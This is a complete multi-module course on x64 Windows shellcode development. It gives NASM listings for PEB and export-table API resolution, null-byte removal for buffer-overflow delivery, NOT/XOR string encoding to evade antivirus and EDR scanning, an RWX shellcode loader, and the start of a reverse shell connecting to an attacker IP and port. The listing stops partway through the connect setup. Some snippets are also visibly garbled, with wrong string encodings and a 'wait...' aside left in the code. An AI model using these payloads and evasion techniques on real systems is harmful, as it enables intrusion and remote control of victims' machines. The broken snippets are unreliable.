x64 Assembly & Shellcoding 101

Module One

x64 Essentials — Registers, Stack Alignment & Shadow Space

// The boring vital stuff that makes everything else work

Learning Objectives

Understand the x64 register set — volatile vs. non-volatile and why it matters for shellcode
Implement correct 16-byte stack alignment before every function call
Allocate and manage shadow space correctly in NASM
Pass 1–4+ parameters using the Windows x64 calling convention
Set up a working NASM build environment on Windows

Registers — Volatile vs. Non-Volatile

The x64 register set is the foundation of everything in this course. Before writing a single line of shellcode, you need to know which registers you can trust across function calls and which ones will be clobbered. Get this wrong and your shellcode will fail in subtle, maddening ways.

The Windows x64 ABI divides registers into two categories. Volatile registers — RAX, RCX, RDX, R8, R9, R10, R11 — are considered scratch registers that any function call is free to destroy. If you store a value in RCX before a call, don't expect it to be there afterward. Non-volatile registers — RBX, RBP, RDI, RSI, R12–R15, RSP — are preserved across calls by the callee. For shellcode, we rely heavily on R12–R15 to store API handles and base addresses we need to keep throughout execution.

Register	Type	Role in Shellcode	Sub-registers (64→8-bit)
RAX	Volatile	Return value from function calls; scratch	RAX → EAX → AX → AL/AH
RCX	Volatile	1st function parameter	RCX → ECX → CX → CL
RDX	Volatile	2nd function parameter	RDX → EDX → DX → DL
R8	Volatile	3rd function parameter	R8 → R8D → R8W → R8B
R9	Volatile	4th function parameter	R9 → R9D → R9W → R9B
R10/R11	Volatile	Scratch; sometimes used for 5th/6th params	R10/R11D/W/B
RBX	Non-Volatile	Loop counters, base pointers	RBX → EBX → BX → BL
R12	Non-Volatile	Store DLL base addresses (kernel32, user32)	R12 → R12D → R12W → R12B
R13	Non-Volatile	Store resolved API addresses	R13 → R13D → R13W → R13B
R14	Non-Volatile	Store resolved API addresses	R14 → R14D → R14W → R14B
R15	Non-Volatile	Store resolved API addresses	R15 → R15D → R15W → R15B
RSP	Non-Volatile	Stack pointer — must be 16-byte aligned before calls	RSP only
RIP	Special	Instruction pointer — used in PIC code for addressing	RIP only

16-Byte Stack Alignment

This is one of the most important — and most confusing — aspects of x64 assembly for newcomers. The Windows x64 ABI requires that RSP be divisible by 16 (aligned to a 16-byte boundary) immediately before any call instruction. If you violate this, your code will likely jump to an unintended memory location and crash.

The simplest mental model: the last hex digit of RSP must be 0 before a call. Instructions that modify RSP by 8 bytes each — push and pop — flip it between aligned and unaligned. Track your pushes and pops carefully.

ℹ Quick check: If RSP ends in 8 (e.g., 0x...ff8) you're misaligned by 8. A single push rax or sub rsp, 8 will re-align it. If it ends in 0 you're good to call.

      NASM x64
      stack_align_example.asm — demonstrating alignment mechanics
    
; Stack alignment demonstration
; Entry point — RSP is typically misaligned here by 8 (CALL pushed return addr)
; Fix it immediately at the top of your code:

sub rsp, 0x28        ; 0x20 shadow space + 0x8 to fix alignment = 0x28
and rsp, 0xFFFFFFFFFFFFFFF0  ; nuclear option: force-align RSP (use at entry if unsure)

; Before a call with 4 or fewer args — allocate shadow space:
sub rsp, 0x30        ; 0x20 shadow + 0x10 to maintain 16-byte alignment
call r15            ; call our stored API address
add rsp, 0x30        ; restore RSP after the call

; WinExec example — 2 parameters (RCX, RDX)
pop r15             ; WinExec address previously pushed onto stack
xor rax, rax        ; zero RAX (we'll use this for NULL terminator trick later)
push rax            ; push NULL — RSP now misaligned (odd push count)
mov rax, 0x6578652E636C6163  ; "calc.exe" in little-endian hex
push rax            ; push string — RSP now aligned again (even push count)
mov rcx, rsp        ; RCX (1st param) = pointer to "calc.exe" string
mov rdx, 1          ; RDX (2nd param) = SW_SHOWNORMAL
sub rsp, 0x30        ; shadow space allocation — keeps alignment
call r15            ; WinExec("calc.exe", 1)
add rsp, 0x30        ; restore shadow space

Shadow Space

Shadow space (also called the "home space" or "spill area") is 32 bytes (4 × 8-byte slots) that the caller must allocate on the stack before every call. Even if a function takes zero arguments, you must allocate sub rsp, 0x20 worth of shadow space. The callee uses this space to spill its register parameters to memory if needed — but that's the callee's business. Your job as the caller is just to make sure it's there.

In practice, you'll almost always see sub rsp, 0x28 or sub rsp, 0x30 before a call — the extra 8 or 16 bytes are to maintain 16-byte alignment on top of the 32-byte shadow requirement.

Calling Convention — Passing Parameters

Windows x64 uses a register-based calling convention for the first four arguments. Arguments 5 and beyond go directly onto the stack above the shadow space, at RSP+0x28, RSP+0x30, etc. This is one of the trickiest parts of the reverse shell module where STARTUPINFOA requires many fields.

NASM is the assembler of choice for this course. Download the Windows binary from nasm.us and add it to your PATH. You'll also need a linker — MinGW-w64 (via winlibs) is recommended. The exact toolchain used in this course:
- NASM 2.16+ — nasm.us/pub/nasm/releasebuilds
- MinGW-w64 (winlibs build) — includes ld, gcc, and friends
- x64dbg — for debugging and verifying stack state during development
- Pepper PE Viewer — for manually walking PE headers (Module 2)
Standard compile+link pipeline for a standalone executable:

💡 nasm -f win64 shellcode.asm -o shellcode.obj then ld -m i386pep shellcode.obj -o shellcode.exe -lkernel32

For pure shellcode extraction (no PE wrapper), compile with NASM raw binary output: nasm -f bin shellcode.asm -o shellcode.bin then extract bytes with a Python script or objdump.
Understanding sub-registers is essential for NULL-free shellcode (Module 3) and for working with PE structure fields that mix WORD, DWORD, and QWORD sizes.
- RAX = full 64-bit register
- EAX = lower 32 bits — writing EAX zero-extends into RAX (important: clears upper 32 bits)
- AX = lower 16 bits — writing AX does NOT zero-extend upper bits
- AL = lower 8 bits; AH = bits 8-15
The zero-extension behavior of 32-bit writes is a powerful NULL-free trick: xor eax, eax is a 2-byte instruction that zeroes all 64 bits of RAX — whereas mov rax, 0 produces null bytes in the encoding.

💡 CL is the lower 8 bits of RCX — you'll see this used for shift/rotate amounts like shl rax, cl when the shift count is stored in RCX.
x64 is little-endian. When you move a string into a register and push it to the stack, the bytes are stored in reverse order at the memory level but read correctly as a C string because the string pointer points to the lowest address.

To encode calc.exe as a 64-bit immediate: read the characters in reverse, convert each to hex, and concatenate: e=65, x=78, e=65, .=2E, c=63, l=6C, a=61, c=63 → 0x6578652E636C6163

💡 Python encoder: s = "calc.exe"; print(hex(int.from_bytes(s.encode(),'big'))) — then reverse byte order for little-endian placement.

⚠ Strings longer than 8 characters must be split across multiple pushes. Plan your string layout carefully — each push places exactly 8 bytes on the stack.
x64dbg is the primary debugging tool for shellcode development. Essential workflow:
- Set breakpoints on your code's entry point to inspect initial register/stack state
- Single-step (F7) through each instruction watching the register panel
- Watch the stack panel — verify RSP divisibility by 16 before every CALL
- Use the memory map view to verify allocated regions (VirtualAlloc verification)
- Set hardware breakpoints on memory addresses to catch unexpected writes
The register panel in x64dbg highlights changed registers in red after each step — invaluable for spotting unexpected clobbers from function calls and confirming your non-volatile register strategy is working.

💡 Before your CALL instruction, check the last hex digit of RSP in x64dbg's register panel. Must be 0. If it's 8, you need one more push or sub rsp, 8.

Module Two

PE Structure & Walking the Export Table

// Finding WinExec without importing anything

Learning Objectives

Navigate the PEB to locate kernel32.dll base address without any imports
Walk the PE export directory to resolve function addresses by name hash
Understand the AddressOfNames → Ordinals → AddressOfFunctions lookup chain
Use Pepper PE Viewer to manually verify offsets before coding them
Write the foundational IAT-walking stub that every shellcode in this course builds on

Why Walk the PE Table?

Position-independent shellcode can't import functions the normal way — there's no Import Address Table (IAT) at a fixed address. Instead, we locate what we need at runtime by walking the Process Environment Block (PEB) to find loaded modules, then parsing the PE export table of each module to resolve function addresses by name. This technique is used in virtually every non-trivial shellcode payload in the wild.

The chain: GS:[0x60] → PEB → PEB_LDR_DATA → InMemoryOrderModuleList → kernel32 base → PE headers → Export Directory → AddressOfNames / AddressOfFunctions

PEB Walk — Locating kernel32.dll

The PEB (Process Environment Block) is accessible at GS:[0x60] in x64. It contains a pointer to PEB_LDR_DATA at offset 0x18, which contains the InMemoryOrderModuleList at offset 0x20. This doubly-linked list contains every loaded module. The third entry is reliably kernel32.dll in standard Windows processes.

      NASM x64
      peb_walk.asm — locate kernel32.dll base address via PEB
    
; peb_walk.asm — g3tsyst3m Module 2
; Locate kernel32.dll base address via the PEB InMemoryOrderModuleList
; Result: kernel32 base address in R8 (non-volatile, preserved across calls)

sub rsp, 0x28                ; stack alignment + shadow space prologue
and rsp, 0xFFFFFFFFFFFFFFF0    ; force-align RSP

; ── Step 1: Get PEB address from GS segment register ──
mov rax, [gs:0x60]           ; RAX = PEB base address

; ── Step 2: Get PEB_LDR_DATA ──
mov rax, [rax+0x18]          ; RAX = PEB->Ldr (PEB_LDR_DATA*)

; ── Step 3: InMemoryOrderModuleList.Flink (first entry = ntdll) ──
mov rax, [rax+0x20]          ; RAX = first LIST_ENTRY (ntdll)
mov rax, [rax]              ; RAX = second entry (this process's image or ntdll variant)
mov rax, [rax]              ; RAX = third entry = kernel32!

; ── Step 4: Extract DllBase (base address) ──
; LIST_ENTRY is InMemoryOrder, DllBase is at offset +0x20 from InMemoryOrder link
mov r8, [rax+0x20]          ; R8 = kernel32.dll base address — store in non-volatile!
mov rbx, r8                ; RBX = kernel32 base (working copy for PE parsing)

; ── Step 5: Navigate to PE header ──
mov ebx, [rbx+0x3C]         ; EBX = RVA of PE signature (e_lfanew field)
add rbx, r8                ; RBX = VMA of PE header (kernel32 base + RVA)

Export Directory Walk — Resolving WinExec

With the PE header address in hand, we navigate to the Export Directory and walk three parallel arrays: AddressOfNames (function name strings), AddressOfNameOrdinals (index mapping names to functions), and AddressOfFunctions (actual RVAs). The lookup: search AddressOfNames for our target string → get the ordinal index → use that to index into AddressOfFunctions → add kernel32 base to get the VMA.

      NASM x64
      export_walk.asm — walk PE export table to resolve WinExec
    
; export_walk.asm — g3tsyst3m Module 2
; Continues from peb_walk.asm — RBX = PE header VMA, R8 = kernel32 base
; Goal: resolve WinExec address into R15

; ── Navigate to Export Directory ──
; Export Directory RVA is at PE_header+0x88 (IMAGE_OPTIONAL_HEADER64 DataDirectory[0])
xor rcx, rcx               ; clear RCX — used as counter
add cx, 0x88ff             ; add 0x88ff to lower 16 bits (NULL-free trick for 0x88)
shr rcx, 0x8              ; shift right — RCX = 0x88 (our export dir offset)
mov edx, [rbx+rcx]        ; EDX = Export Directory RVA
add rdx, r8               ; RDX = Export Directory VMA

; ── Get AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals ──
mov r10d, [rdx+0x14]       ; R10D = NumberOfFunctions
xor r11, r11               ; R11 = 0 (index counter)
mov r12d, [rdx+0x20]       ; R12D = AddressOfNames RVA
add r12, r8               ; R12  = AddressOfNames VMA

; ── Load target function name "WinExec" onto stack for comparison ──
mov rcx, rdx               ; preserve Export Dir pointer in RCX
mov rax, 0xa8969191ba9a9c6f  ; "WinExec" encoded (NOT-encoded, Module 4 style)
not rax                   ; decode: now RAX = "WinExec" in little-endian bytes
shl rax, 0x8              ; shift to align string bytes (remove extra byte)
shr rax, 0x8              ; right shift — null-terminates without a null in shellcode
push rax                  ; push "WinExec\0" to stack
mov rax, rsp              ; RAX = pointer to "WinExec" string
add rsp, 0x8              ; clean up stack (our string is in RAX ptr)

; ── Name search loop ──
findname:
jecxz done               ; if ECX counter = 0, we've exhausted names (not found)
xor rbx, rbx
mov ebx, [r12+r11*4]       ; EBX = AddressOfNames[i] RVA
add rbx, r8               ; RBX = function name string VMA
dec rcx                   ; decrement counter
mov r13, [rbx]            ; R13 = first 8 bytes of function name
cmp r13, [rax]            ; compare with our target "WinExec"
je found
inc r11                   ; increment name index
jmp findname

found:
; ── Get ordinal → function address ──
xor r13, r13
mov r13d, [rcx+0x24]       ; R13D = AddressOfNameOrdinals RVA
add r13, r8               ; R13  = AddressOfNameOrdinals VMA
mov r13w, [r13+r11*2]      ; R13W = ordinal for our function

xor r14, r14
mov r14d, [rcx+0x1C]       ; R14D = AddressOfFunctions RVA
add r14, r8               ; R14  = AddressOfFunctions VMA
mov eax, [r14+r13*4]       ; EAX  = WinExec function RVA
add rax, r8               ; RAX  = WinExec VMA (final resolved address!)
mov r15, rax               ; R15  = WinExec address (non-volatile storage)

done:

Before writing PE-walking code, manually verify the offsets you expect to find using a PE viewer. Pepper (a free x64-capable PE viewer) is the tool used throughout this course. Load kernel32.dll into Pepper and navigate to the Export Directory.
- DOS Header → e_lfanew field at offset 0x3C: points to the PE signature
- Optional Header → Data Directory[0] at PE+0x88: Export Directory RVA
- Export Directory: +0x14 = NumberOfNames, +0x1C = AddressOfFunctions RVA, +0x20 = AddressOfNames RVA, +0x24 = AddressOfNameOrdinals RVA
Cross-reference what Pepper shows against what your shellcode computes in x64dbg — if they don't match, your offset arithmetic is wrong.

💡 On Windows 11, some PE viewers report that AddressOfNames index aligns directly with AddressOfFunctions index without needing the ordinal lookup. Test on your target OS — behavior may vary.
The three arrays in the Export Directory work together as a cross-referenced lookup table. They are parallel arrays but are not the same length — AddressOfFunctions includes exported-by-ordinal functions that have no name.
- AddressOfNames[i] → RVA of the name string for the i-th named export
- AddressOfNameOrdinals[i] → ordinal index into AddressOfFunctions for the i-th named export
- AddressOfFunctions[ordinal] → RVA of the actual function
So the flow is: scan AddressOfNames until you find your target function name → record index i → look up AddressOfNameOrdinals[i] to get ordinal j → look up AddressOfFunctions[j] to get the function RVA → add DLL base to get the VMA you can call.

⚠ Always add the DLL base address to RVAs. A common mistake is using the RVA directly as a call target — it will crash because RVAs are relative to the DLL base, not absolute addresses.
An interesting observation noted during development of this course: on Windows 11 (tested on two separate machines), the AddressOfNames index appears to align directly with the AddressOfFunctions index — making the AddressOfNameOrdinals lookup potentially redundant for straightforward name-based resolution.

This behavior may be implementation-specific or version-dependent. The course code uses the full three-array lookup which is correct and portable across all Windows versions. If you're targeting exclusively Windows 11 and want to simplify your code, test this observation on your specific build before relying on it.

💡 This is the kind of internals observation worth writing about — small deviations from documented behavior that practitioners discover empirically. Document your findings for the community.
With WinExec resolved into R15, executing calc.exe is straightforward. The key is correct string placement and parameter passing:
- Push a NULL terminator (using a zeroed register, not a literal 0 which creates null bytes)
- Push the "calc.exe" string bytes in little-endian order
- Set RCX = RSP (pointer to the string)
- Set RDX = 1 (SW_SHOWNORMAL)
- Allocate shadow space, call R15
At this point the shellcode contains null bytes — that's acceptable for a first test. Module 3 covers removing them for use in buffer overflows and shellcode loaders that use strcpy-style copying.

⚠ This version of the shellcode is NOT suitable for use via buffer overflow or most shellcode loaders due to embedded null bytes. Module 3 is required before operational use.

Module Three

NULL Byte Elimination

// Making shellcode actually usable in the real world

Learning Objectives

Identify every source of null bytes in x64 assembly output using objdump
Apply shift-based null termination to push strings without null bytes in shellcode
Use XOR + ADD tricks for loading memory offsets that would otherwise produce nulls
Verify null-free output and extract clean shellcode bytes

Why NULL Bytes Break Shellcode

Many classic shellcode delivery mechanisms — stack-based buffer overflows, format string exploits, and string-copy loaders — treat 0x00 as a string terminator. If your shellcode contains a null byte, the delivery mechanism stops copying at that point and your payload is truncated. NULL-free shellcode is not optional for real-world use — it's a requirement.

The good news: every instruction that produces a null byte has a null-free equivalent, just less obvious. The core techniques are shift-based string null-termination, XOR/ADD for zero values, and careful register sizing.

      NASM x64
      null_removal.asm — key techniques for eliminating null bytes
    
; null_removal.asm — g3tsyst3m Module 3
; Core techniques for NULL-free shellcode

; ── Technique 1: XOR to zero a register (no null bytes) ──
; BAD:  mov rax, 0     → produces \x48\xb8\x00\x00\x00\x00\x00\x00\x00\x00 (8 nulls!)
; GOOD: xor rax, rax   → produces \x48\x31\xc0 (3 bytes, zero nulls)
xor rax, rax               ; zero RAX — the canonical null-free zeroing idiom
xor rcx, rcx               ; same for RCX (first parameter)

; ── Technique 2: Shift-based string null termination ──
; Goal: push "WinExec\0" without embedding a 0x00 byte in our shellcode
; "WinExec" = 7 bytes. We load 8 bytes where byte[0] = 0x90 (placeholder)
mov rax, 0x90636578456E6957  ; 0x90 + "WinExec" — 0x90 is our non-null placeholder
shl rax, 0x8               ; shift left 8 bits → 0x636578456E695700 (0x90 gone, null at MSB)
shr rax, 0x8               ; shift right 8 bits → 0x00636578456E6957 (null byte in MSB position)
push rax                   ; stack now has "WinExec\0" — the null is IN MEMORY, not in shellcode!

; ── Technique 3: ADD/SHR trick for NULL-free memory offsets ──
; Problem: mov edx, [rbx+0x88] → "0x88" itself is fine but the MOD/RM encoding
; of certain combinations produces null bytes. Use register indirection instead:
xor rcx, rcx               ; zero RCX
add cx, 0x88ff             ; add 0x88ff to CX (16-bit) — no null bytes in this encoding
shr rcx, 0x8               ; shift right 8 → RCX = 0x88 (the value we wanted)
mov edx, [rbx+rcx]        ; now use RCX as the offset — no null in encoding!

; ── Technique 4: Use JECXZ instead of loop with potential null branch ──
; jecxz (jump if ECX is zero) is 2 bytes, no nulls, perfect for loop control
jecxz done                 ; jump to done if ECX = 0 (exhausted function names)

; ── Verification: use objdump to check for nulls ──
; objdump -d -M intel shellcode.o | grep " 00 "
; Any line with " 00 " in the hex column is a null byte — fix it!

The fastest way to audit your shellcode for null bytes is objdump from the MinGW-w64 toolchain. After compiling your .asm file to a .obj, run:

💡 objdump -d -M intel shellcode.obj | grep -E " 00 | 00$" — any match is a null byte in your machine code that needs to be eliminated.

Common null byte sources to look for:
- mov rax, 0 — produces 8 null bytes. Replace with xor rax, rax
- mov rdx, 1 — mov rdx, 0x01 zero-pads to 8 bytes. Use xor rdx, rdx; inc rdx
- push 0 — use xor rax, rax; push rax instead
- String immediates with fewer than 8 significant bytes — high bytes zero-padded → null bytes
After fixing all nulls, extract your shellcode bytes with: objcopy -O binary shellcode.obj shellcode.bin then verify with python3 -c "d=open('shellcode.bin','rb').read(); print('CLEAN' if b'\\x00' not in d else f'NULLS: {d.count(chr(0).encode())}')"
This is the most elegant null-free technique in the course and worth deeply understanding. The insight: a null byte is only a problem when it appears in the machine code (the shellcode bytes themselves). A null byte that only exists in memory at runtime (on the stack after a push) is perfectly fine.

The SHL/SHR pair creates a runtime null terminator:
- Load the string with a non-null placeholder byte (e.g., 0x90) in the highest position
- shl rax, 8 shifts the placeholder off the top, pushing a 0x00 in from the bottom — but this 0x00 is not in the shellcode, it's created by the CPU during execution
- shr rax, 8 shifts everything back, leaving the null at the top (MSB) of RAX
- push rax places the properly null-terminated string on the stack
The SHL and SHR instructions themselves encode as non-null bytes. The null only materializes as data during execution — exactly what we need.
Once you've confirmed no nulls with objdump, extract the raw shellcode bytes and test them in a C++ loader:

💡 Extract: for /f "tokens=1*" %a in ('objdump -d shellcode.obj') do @echo %b — or use the Python extraction script provided in the course materials.

The standard test harness used throughout this course:
- Declare shellcode as unsigned char shellcode[] with your extracted bytes
- Allocate RWX memory with VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
- Copy shellcode to the allocation with memcpy
- Cast the allocation to a function pointer and call it
If it executes correctly, your shellcode is ready for use in exploit development or payload delivery. The Module 8 loader wraps this into a production-ready harness.

Module Four

String Encoding with Bitwise Operations

// Defeating static analysis without an encoder framework

Learning Objectives

Encode string literals using the NOT instruction to defeat static AV string scanning
Use the Windows Calculator to pre-compute NOT values without writing a script
Apply XOR encoding as an alternative to NOT for string obfuscation
Understand the limits of single-instruction encoding vs. full encryption

Why Encode Strings in Shellcode?

Static analysis tools — antivirus, YARA rules, EDR file scanning — look for recognizable strings like WinExec, calc.exe, cmd.exe, and Windows API names in binary files. If your shellcode contains these as plaintext, a simple string scan will flag it before it ever executes. The NOT instruction gives us a one-instruction encode/decode that adds zero overhead and eliminates plaintext strings entirely.

      NASM x64
      not_encoding.asm — NOT-based string encoding for static analysis evasion
    
; not_encoding.asm — g3tsyst3m Module 4
; Encode strings using NOT instruction — defeats simple string scanning
; Pre-computation: take your target string's hex value and NOT it in the Calculator
; Store the NOT'd value in shellcode → at runtime, NOT it back to the original

; ── Encoding "WinExec" with NOT ──
; Original "WinExec" as immediate: 0x636578456E6957 (7 bytes, MSB-first)
; Apply NOT: ~0x90636578456E6957 = 0x6F9C9A87BA9196A8
; This is what we store — static scanners see 0x6F9C9A87BA9196A8, not "WinExec"

mov rax, 0x6F9C9A87BA9196A8  ; NOT'd "WinExec" (stored in shellcode)
not rax                    ; decode at runtime → RAX = 0x90636578456E6957
shl rax, 0x8               ; shift placeholder out, null into MSB
shr rax, 0x8               ; RAX = "WinExec\0" — ready to push
push rax

; ── Encoding "calc.exe" with NOT ──
; Original: 0x6578652E636C6163 → NOT'd: 0x9A879AD19C939E9C

mov rax, 0x9A879AD19C939E9C  ; NOT'd "calc.exe"
not rax                    ; decode → RAX = "calc.exe"
push rax                   ; push decoded string (already 8 bytes, no shl/shr needed)
mov rcx, rsp               ; RCX = pointer to "calc.exe"

; ── Using Windows Calculator to pre-compute NOT values ──
; 1. Open Calculator → Programmer mode
; 2. Enter your string hex value
; 3. Click NOT → result is your encoded value to embed in shellcode
; 4. To verify: NOT(NOT(x)) = x — double-NOT should give you back the original

; ── XOR encoding as an alternative ──
; Choose any non-null key (e.g., 0xAA)
mov rax, 0xCBDFD884CC0600C9  ; "WinExec" XOR'd with 0xAAAAAAAAAAAAAA
xor rax, 0xAAAAAAAAAAAAAAAA  ; XOR back with same key → original string
; XOR key must not create null bytes! Choose your key carefully.

You don't need a script to compute NOT-encoded string values. Windows Calculator in Programmer mode handles this directly:
- Open Calculator → switch to Programmer mode (Alt+3)
- Set the word size to QWORD (64-bit)
- Enter your string's hex value (e.g., 90636578456E6957 for "WinExec" with 0x90 placeholder)
- Click the NOT button — the result is your encoded value
- Verify: paste the result back in, click NOT again — you should get your original value
💡 This is the workflow used for every encoded string in the course. No Python, no script — just the calculator. Fast and reliable for pre-computing a handful of strings.

For larger string sets or automated workflows, a one-liner works: python3 -c "x=0x90636578456E6957; print(hex(~x & 0xFFFFFFFFFFFFFFFF))"
NOT encoding defeats static string scanning — AV/EDR tools that look for plaintext strings in binary files. It does not defeat:
- Behavioral detection — the shellcode still calls the same APIs in the same order
- Dynamic analysis / sandboxing — the strings are decoded at runtime and visible in memory
- Memory scanning — after decoding, the strings exist in process memory
- YARA rules targeting the NOT-encoded values themselves (if the rule is updated)
For stronger evasion, the next layer is XOR-based payload encryption (encrypting the entire shellcode blob, not just individual strings) with runtime decryption. That topic is covered in advanced EDR evasion content beyond this 101 course.

⚠ Don't mistake string encoding for security. It's a static analysis speed bump, not a comprehensive evasion strategy. Modern EDR products with behavioral analysis will still catch shellcode that calls VirtualAlloc + memcpy + function pointer in sequence.

Module Five

Dynamic API Resolution with GetProcAddress

// Popping a MessageBox the hard way — and why it matters

Learning Objectives

Use GetProcAddress and LoadLibraryA to load user32.dll and resolve MessageBoxA
Manage the 4-parameter calling convention for MessageBoxA in x64 assembly
Locate ExitProcess to cleanly terminate shellcode without crashing
Build a reusable API resolution stub for use in more complex shellcode

Beyond kernel32 — Loading Additional DLLs

Our PE-walking technique from Module 2 locates functions in kernel32.dll. But shellcode often needs APIs from other DLLs — user32.dll for UI functions, ws2_32.dll for sockets, ntdll.dll for native APIs. The solution: use GetProcAddress and LoadLibraryA (both in kernel32) to dynamically load any DLL and resolve any function at runtime. This is the API resolution pattern used in the reverse shell in Modules 6 and 7.

      NASM x64
      getprocaddress.asm — dynamic API resolution and MessageBoxA pop
    
; getprocaddress.asm — g3tsyst3m Module 5
; Resolve GetProcAddress via PE walk, then use it to load user32.dll and MessageBoxA
; Prerequisite: R8 = kernel32 base, PE walk completed from Module 2

; ── Locate GetProcAddress ── (using same PE walk, searching for "GetProcAddress")
; Result stored in R14 (non-volatile)

; ── Locate LoadLibraryA ──
; Result stored in R15 (non-volatile)

; ── Locate ExitProcess ──
mov r13, r12               ; temp copy of kernel32 handle (GetProcAddress will need it)
mov rcx, rdi               ; RCX = kernel32 module handle (1st param)

; Push "ExitProcess" string NULL-free:
mov rax, 0x90737365         ; "ess" + 0x90 placeholder, 4-byte value
shl eax, 0x8               ; 0x73736500 — null terminated in 32-bit
shr eax, 0x8               ; 0x00737365 — "ess\0"
push rax                   ; push "ess\0"
mov rax, 0x636F725074697845  ; "ExitProc" (little-endian)
push rax                   ; push "ExitProc"
mov rdx, rsp               ; RDX = pointer to "ExitProcess" string
sub rsp, 0x30
call r14                   ; GetProcAddress(kernel32, "ExitProcess")
add rsp, 0x30
mov r14, rax               ; R14 = ExitProcess address

; ── Load user32.dll ──
xor rax, rax
mov al, 0x6C               ; "l" character
shl eax, 0x10              ; make room: 0x006C0000
shr eax, 0x10              ; 0x0000006C — "l\0" (null terminated!)
push rax
mov rax, 0x642E323372657375  ; "user32.d" little-endian
push rax
mov rcx, rsp               ; RCX = "user32.dll"
sub rsp, 0x30
call r15                   ; LoadLibraryA("user32.dll")
add rsp, 0x30
mov rdi, rax               ; RDI = user32.dll base address

; ── Resolve MessageBoxA from user32.dll ──
mov rcx, rdi               ; RCX = user32.dll handle
mov rax, 0x41797261         ; "Aary" → last 4 bytes of "MessageBoxA"
push rax
mov rax, 0x426F636573736147  ; "GasseBoG" wait... "MessageBo" in LE
push rax
mov rdx, rsp               ; RDX = "MessageBoxA"
sub rsp, 0x30
call r13                   ; GetProcAddress(user32, "MessageBoxA") — stored earlier
add rsp, 0x30
mov r15, rax               ; R15 = MessageBoxA address

; ── Call MessageBoxA(NULL, "g3tsyst3m", "g3tsyst3m", MB_OK) ──
xor rcx, rcx               ; RCX = NULL (no owner window)
mov rax, 0x006D             ; "m\0" — final char of "g3tsyst3m"
push rax
mov rax, 0x3374737973743367  ; "g3tsyst3" in little-endian
push rax
mov rdx, rsp               ; RDX = lpText = "g3tsyst3m"
mov r8, rsp                ; R8  = lpCaption = same string
xor r9d, r9d               ; R9  = uType = MB_OK (0)
sub rsp, 0x30
call r15                   ; MessageBoxA — pops the g3tsyst3m box!
add rsp, 0x30

With multiple API calls in flight, register management becomes critical. The strategy used throughout this course:
- R12 — kernel32.dll base address (set once, never overwritten)
- R13 — GetProcAddress function address
- R14 — ExitProcess / current secondary API being used
- R15 — primary call target (the API we're about to call)
- RDI — secondary DLL base (user32, ws2_32, etc.)
Before each API call, check that you haven't accidentally clobbered a non-volatile register. x64dbg's register panel makes this obvious — values that changed after a CALL in the non-volatile registers signal a bug in your convention usage (or the called API is non-conformant, which is rare but possible).

💡 When debugging, color-code your register assignments in comments: RBX=kernel32, R12=kernel32_base, etc. Shellcode debugging without this discipline is a nightmare.
After your shellcode's payload executes, the instruction pointer needs somewhere to go. Without a clean exit, execution continues into whatever memory follows the shellcode — almost certainly crashing. Always end shellcode with a call to ExitProcess.

ExitProcess takes one parameter: the exit code (typically 0). Since it's in kernel32, we can resolve it via our PE walk or via GetProcAddress. The course resolves it via GetProcAddress after establishing the GetProcAddress function pointer.

⚠ In some shellcode scenarios (injected threads, callback-based execution), calling ExitProcess terminates the entire host process — not just your thread. In those cases, use ExitThread instead. Know your execution context before choosing your exit strategy.

Module Six

Reverse Shell — Using Extern APIs

// Building your first reverse shell the easy way before doing it the hard way

Learning Objectives

Understand the Winsock API chain required for a TCP reverse shell
Use EXTERN declarations to link against ws2_32.lib and kernel32.lib
Populate the STARTUPINFOA structure correctly in x64 assembly
Redirect stdin/stdout/stderr to a socket handle for shell I/O
Compile and link a functional reverse shell executable with MinGW-w64

The Extern Approach — Learning Before the Deep End

A full dynamic reverse shell (Module 7) requires resolving 6+ socket APIs manually via PE walking — that's 500+ lines of assembly and a significant complexity jump. Module 6 uses EXTERN declarations to link against the APIs directly, producing a clean, readable reverse shell that demonstrates the logic without the noise. Think of it as a scaffold: understand the control flow here, then Module 7 removes the training wheels.

      NASM x64
      asmsock_extern.asm — reverse shell using EXTERN API declarations
    
; asmsock_extern.asm — g3tsyst3m Module 6
; Reverse shell via extern APIs — compile+link:
; nasm -f win64 asmsock_extern.asm -o asmsock.obj
; ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32

BITS 64
section .text
global main

; ── Extern declarations — linker resolves these from ws2_32/kernel32 ──
extern WSAStartup
extern WSASocketA
extern WSAConnect
extern CreateProcessA
extern ExitProcess

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0

; ── WSAStartup(0x0202, &wsaData) ──
sub rsp, 0x200             ; allocate space for WSADATA structure (408 bytes)
mov rcx, 0x0202            ; wVersionRequired = 2.2
mov rdx, rsp               ; &wsaData
sub rsp, 0x30
call WSAStartup
add rsp, 0x30

; ── WSASocketA(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6, NULL, 0, 0) ──
xor rcx, rcx
mov cl, 2                  ; AF_INET
xor rdx, rdx
mov dl, 1                  ; SOCK_STREAM
xor r8, r8
mov r8b, 6                 ; IPPROTO_TCP
xor r9, r9                 ; lpProtocolInfo = NULL
; 5th param (0) and 6th param (0) go on stack above shadow space:
xor rax, rax
push rax                   ; dwFlags = 0 (6th param)
push rax                   ; g = 0 (5th param)
sub rsp, 0x20              ; shadow space
call WSASocketA             ; returns socket handle in RAX
add rsp, 0x30              ; restore (shadow + 2 stack params)
mov rdi, rax               ; RDI = socket handle (preserve in non-volatile)

; ── Build SOCKADDR_IN structure on stack ──
; struct { WORD family; WORD port; DWORD addr; BYTE zero[8]; }
xor rax, rax
push rax                   ; padding zeros (8 bytes)
push rax                   ; sin_addr = 0.0.0.0 (replaced: use your attacker IP)
; IP 192.168.1.100 in network byte order (big-endian): 0xC0A80164
mov eax, 0x6401A8C0        ; 192.168.1.100 in little-endian (flip for network order)
push rax
; Port 4444 = 0x115C → network byte order = 0x5C11
mov ax, 0x5C11             ; htons(4444)
xor rcx, rcx
mov cx, 2                  ; AF_INET
shl rcx, 16
or  rcx, rax               ; combine family + port into one QWORD push
push rcx
mov rdx, rsp               ; RDX = &SOCKADDR_IN

; ── WSAConnect(socket, &sockaddr, sizeof(sockaddr), NULL, NULL, NULL, NULL) ──
mov rcx, rdi               ; socket handle
xor r8, r8
mov r8b, 16                ; sizeof(SOCKADDR_IN)
xor r9, r9                 ; lpCallerData = NULL
; remaining NULLs on stack for params 5-7:
